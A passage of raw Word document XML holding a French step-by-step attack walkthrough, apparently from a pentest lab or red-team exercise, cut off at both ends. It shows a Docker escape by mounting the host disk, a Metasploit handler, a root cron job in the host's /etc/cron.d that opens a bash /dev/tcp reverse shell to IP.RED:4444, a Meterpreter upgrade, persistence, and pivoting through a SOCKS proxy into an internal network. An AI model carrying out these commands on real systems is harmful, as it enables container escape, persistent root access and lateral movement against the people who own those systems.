        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C713859" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="179" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B9C67" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Créer un fichier dans /mnt/host pour monter le système hôte du conteneur Docker et effectuer une évasion Docker pour monter le système hôte dans le répertoire. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBEED0" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="128" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4846" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7141FCF8" wp14:editId="0B929841">
            <wp:extent cx="3526790" cy="124968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0581C6" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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 w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26504519" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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 w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/sda1 /mnt/host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077A473" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="164"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mettre en écoute un gestionnaire de connexion </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (exploit/multi/handler). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ECBDD9" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="206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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C013A" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="182" w:line="259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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LHOST IP.RED</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207EE48" w14:textId="55DFDBD5" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Créer une tâche </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D1640B">
        <w:t xml:space="preserve"> « hacker »</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1640B">
        <w:t xml:space="preserve">qui permet de se connecter en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D1640B">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CFC52" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2089" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E7A74B" wp14:editId="7F09AC21">
            <wp:extent cx="5276215" cy="45720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78D086" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="155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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>cd /mnt/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E46C8A" w14:textId="77777777" w:rsidR="001068B6" w:rsidRPr="00D1640B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">printf "* * * * * root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c '0&lt;&amp;101-;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424A507" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>101&lt;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/IP.RED/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4444;sh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&amp;101 &gt;&amp;101 2&gt;&amp;101'\n" &gt; hacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBCE8B" w14:textId="30D81915" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="9"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une fois la session obtenue, </w:t>
      </w:r>
      <w:r w:rsidR="00D1640B">
        <w:t>on monte un</w:t>
      </w:r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Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F6B8A" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="128" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2089" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311D5D8F" wp14:editId="4E9AFC42">
            <wp:extent cx="5276215" cy="2060575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D33B9" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sessions -u 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F560897" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sur le serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web-services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72944E29" w14:textId="77777777" w:rsidR="001068B6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ACC4A7E" wp14:editId="7A52876E">
            <wp:extent cx="2389505" cy="92329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877BC6" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="182" w:line="259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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sessions 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA41E96" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>apt-get update</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29366185" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2647FD11" w14:textId="60F9E6E9" w:rsidR="001068B6" w:rsidRDefault="00D1640B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Création d’un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour mettre la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>persistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en place</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C42F2C" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="133" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4615" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B2287FD" wp14:editId="06C7C6A9">
            <wp:extent cx="3672840" cy="1752600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49BBDF" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="188"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redémarrer le serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Web-services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B61BB3" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, router le trafic vers le réseau 192.168.200.0/24 à travers la session </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (généralement session 2). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56515893" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="128" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8722DD" wp14:editId="2A512877">
            <wp:extent cx="2630170" cy="24066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BFE23D" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">route </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.200.0/24 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156E1AE" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Démarrer un proxy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SOCKSv5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> écoutant localement sur Kali et transmettant le trafic HTTP à travers le tunnel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pour que ce trafic semble initié par le serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web-services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C8770" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="128" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5086" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="068A2F35" wp14:editId="7E41ACC9">
            <wp:extent cx="3374390" cy="542925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848224" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="265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1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/server/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>socks_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78819097" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="182" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Commande: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D1640B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1640B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D94F82E" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="9"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configurer un navigateur sur Kali pour utiliser le proxy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SOCKSv5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> local sur le port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701B1FB" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="122" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2421" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388EA57D" wp14:editId="536F79A9">
            <wp:extent cx="5066030" cy="158813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15F002" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="184"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se connecter au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
